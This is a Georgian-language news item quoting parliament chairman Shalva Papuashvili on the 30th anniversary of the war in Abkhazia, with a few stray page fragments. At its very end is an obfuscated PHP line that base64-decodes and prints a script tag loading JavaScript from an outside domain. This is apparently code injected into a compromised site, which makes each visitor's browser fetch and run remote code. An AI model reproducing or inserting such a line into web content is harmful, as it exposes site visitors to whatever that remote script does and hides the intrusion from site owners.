celsiusi
ავერსი შნაიდერი
ჩვენი ურყევი სამშვიდობო პოლიტიკით, ჩვენს აფხაზ დებთან და ძმებთან ერთად, აუცილებლად მოვიშუშებთ საერთო ჭრილობას და ერთად გავაგრძელებთ ძლიერი, ევროპული სახელმწიფოს მშენებლობას,- ამის შესახებ საქართველოს პარლამენტის თავმჯდომარე სოციალურ ქსელში წერს.
 
შალვა პაპუაშვილის თქმით, ტრაგიკულია ისტორია, რომელიც 30 წლის წინ, ამ აფხაზეთში ომის დაწყების დღეს უკავშირდება.
 
"ჩვენს ქვეყანას მრავალი ქარტეხილი გამოუვლია - ტრაგიკულია ისტორია, რომელიც 30 წლის წინ, ამ დღეს უკავშირდება. ომი, რომელმაც ასიათასობით ჩვენი თანამოქალაქე საკუთარ კერას მოწყვიტა. ომი, რომელსაც ათასობით სამხედრო და სამოქალაქო პირის სიცოცხლე შეეწირა. ჩვენ პატივს მივაგებთ მათ ხსოვნას.
 
ჩვენი ურყევი სამშვიდობო პოლიტიკით, ჩვენს აფხაზ დებთან და ძმებთან ერთად, აუცილებლად მოვიშუშებთ საერთო ჭრილობას და ერთად გავაგრძელებთ ძლიერი, ევროპული სახელმწიფოს მშენებლობას. ჩვენ ერთი დიდი ოჯახი ვართ და ამ ისტორიას ვერავინ შეცვლის!,"-წერს შალვა პაპუაშვილი.
492
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");